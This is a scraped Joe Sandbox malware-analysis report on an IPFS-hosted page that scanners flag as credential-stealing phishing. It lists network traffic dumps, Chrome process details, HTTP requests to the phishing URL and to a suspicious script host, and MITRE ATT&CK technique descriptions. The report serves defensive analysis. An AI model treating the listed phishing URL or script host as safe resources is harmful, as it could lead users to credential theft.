2024-07-10 22:38:46 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 74 76 64 63 50 39 77 38 59 6b 65 57 31 57 71 30 41 77 31 68 6c 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: tvdcP9w8YkeW1Wq0Aw1hlA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.6	49736	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-07-10 22:39:08 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 69 4d 4e 30 59 30 6e 6a 48 45 75 47 54 42 38 6c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 62 36 39 37 65 35 30 31 30 32 36 32 34 63 61 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: iMN0Y0njHEuGTB8l.1Context: 2b697e50102624ca
2024-07-10 22:39:08 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-10 22:39:08 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 69 4d 4e 30 59 30 6e 6a 48 45 75 47 54 42 38 6c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 62 36 39 37 65 35 30 31 30 32 36 32 34 63 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 38 45 74 69 52 70 6f 6a 42 44 67 72 66 53 47 68 73 78 45 53 4f 4a 65 54 58 44 73 66 41 33 42 32 6f 5a 33 4e 2b 67 6a 53 4f 57 4f 56 47 51 44 4e 46 53 56 6f 4b 4f 44 4f 48 2f 32 72 74 41 74 46 6c 53 42 47 63 6c 72 72 6e 42 4e 53 54 6a 70 66 6c 4a 2b 6d 38 6d 67 58 69 6c 37 46 39 69 49 79 57 56 31 4f 31 59 4b 34 6d 59 77 32 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: iMN0Y0njHEuGTB8l.2Context: 2b697e50102624ca<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe8EtiRpojBDgrfSGhsxESOJeTXDsfA3B2oZ3N+gjSOWOVGQDNFSVoKODOH/2rtAtFlSBGclrrnBNSTjpflJ+m8mgXil7F9iIyWV1O1YK4mYw2
2024-07-10 22:39:08 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 69 4d 4e 30 59 30 6e 6a 48 45 75 47 54 42 38 6c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 62 36 39 37 65 35 30 31 30 32 36 32 34 63 61 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: iMN0Y0njHEuGTB8l.3Context: 2b697e50102624ca<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-07-10 22:39:08 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-10 22:39:08 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 30 68 73 54 46 4c 75 41 4a 45 57 6d 6b 51 4b 73 49 52 33 4c 66 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 0hsTFLuAJEWmkQKsIR3LfA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.6	49740	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-07-10 22:39:31 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4e 63 56 6c 52 65 4a 47 37 45 69 39 6e 79 45 77 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 64 36 31 61 62 30 30 64 37 63 32 31 62 35 32 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: NcVlReJG7Ei9nyEw.1Context: fd61ab00d7c21b52
2024-07-10 22:39:31 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-10 22:39:31 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 4e 63 56 6c 52 65 4a 47 37 45 69 39 6e 79 45 77 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 64 36 31 61 62 30 30 64 37 63 32 31 62 35 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 38 45 74 69 52 70 6f 6a 42 44 67 72 66 53 47 68 73 78 45 53 4f 4a 65 54 58 44 73 66 41 33 42 32 6f 5a 33 4e 2b 67 6a 53 4f 57 4f 56 47 51 44 4e 46 53 56 6f 4b 4f 44 4f 48 2f 32 72 74 41 74 46 6c 53 42 47 63 6c 72 72 6e 42 4e 53 54 6a 70 66 6c 4a 2b 6d 38 6d 67 58 69 6c 37 46 39 69 49 79 57 56 31 4f 31 59 4b 34 6d 59 77 32 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: NcVlReJG7Ei9nyEw.2Context: fd61ab00d7c21b52<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe8EtiRpojBDgrfSGhsxESOJeTXDsfA3B2oZ3N+gjSOWOVGQDNFSVoKODOH/2rtAtFlSBGclrrnBNSTjpflJ+m8mgXil7F9iIyWV1O1YK4mYw2
2024-07-10 22:39:31 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4e 63 56 6c 52 65 4a 47 37 45 69 39 6e 79 45 77 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 64 36 31 61 62 30 30 64 37 63 32 31 62 35 32 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: NcVlReJG7Ei9nyEw.3Context: fd61ab00d7c21b52<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-07-10 22:39:31 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-10 22:39:31 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 4e 77 34 72 4f 36 77 35 41 45 65 57 42 77 79 48 47 66 58 52 35 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: Nw4rO6w5AEeWBwyHGfXR5A.0Payload parsing failed.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 2444, Parent PID: 6048

General

Target ID:	0
Start time:	18:38:15
Start date:	10/07/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 2912, Parent PID: 2444

General

Target ID:	2
Start time:	18:38:19
Start date:	10/07/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 --field-trial-handle=2304,i,12673941013066989903,2206991293366356302,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6428, Parent PID: 6048

General

Target ID:	3
Start time:	18:38:21
Start date:	10/07/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Source: http://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy	Avira URL Cloud: detection malicious, Label: phishing
Source: http://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy	SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social usering

Source: global traffic	HTTP traffic detected: GET /ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy HTTP/1.1Host: ipfs.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jsnom.js HTTP/1.1Host: fiveradio-newbam.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ipfs.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ipfs.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ipfs.techConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ipfs.techConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: ipfs.io
Source: global traffic	DNS traffic detected: DNS query: cdn.socket.io
Source: global traffic	DNS traffic detected: DNS query: fiveradio-newbam.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: ipfs.tech

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 45

Chrome Cache Entry: 46

Chrome Cache Entry: 47

Chrome Cache Entry: 48

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 2444, Parent PID: 6048

General

Chronological Activities

Analysis Process: chrome.exePID: 2912, Parent PID: 2444

General

Chronological Activities

Analysis Process: chrome.exePID: 6428, Parent PID: 6048

General

Chronological Activities

Disassembly

Windows Analysis Report
http://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy